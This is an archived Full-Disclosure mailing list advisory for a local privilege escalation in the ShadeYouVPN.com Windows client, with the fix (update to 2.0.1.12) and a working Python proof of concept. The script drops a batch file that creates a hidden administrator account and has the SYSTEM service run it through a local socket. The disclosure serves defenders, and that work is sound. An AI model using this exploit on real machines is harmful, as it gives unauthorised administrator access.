lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CACoXDXga08prCi9oZsnnG=2x3JnfgyGaeaVLUh7qJjEFY5e3sw@mail.gmail.com> Date: Tue, 14 Feb 2017 14:11:27 +0100 From: Kacper Szurek <kacperszurek@...il.com> To: fulldisclosure@...lists.org Subject: [FD] ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation # Exploit ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation # Date: 14.02.2017 # Software Link: https://shadeyouvpn.com/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: local 1. Description `ShadeYou` service executes any file path send through socket without verification as SYSTEM user. https://security.szurek.pl/shadeyouvpncom-client-v20111-for-windows-privilege-escalation.html 2. Proof of Concept import socket import tempfile print "ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation" print "by Kacper Szurek" print "https://security.szurek.pl/" print "https://twitter.com/KacperSzurek" t = tempfile.TemporaryFile(delete=False, suffix='.bat') t.write("net user shade /add\n") t.write("net localgroup administrators shade /add") t.close() s = socket.socket() s.connect(("127.0.0.1", 10295)) s.send("s||config|"+t.name+"|ccccc|ddddd|eeee|ffff|\r\n") print s.recv(1024) print s.recv(1024) 3. Solution Update to version 2.0.1.12 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists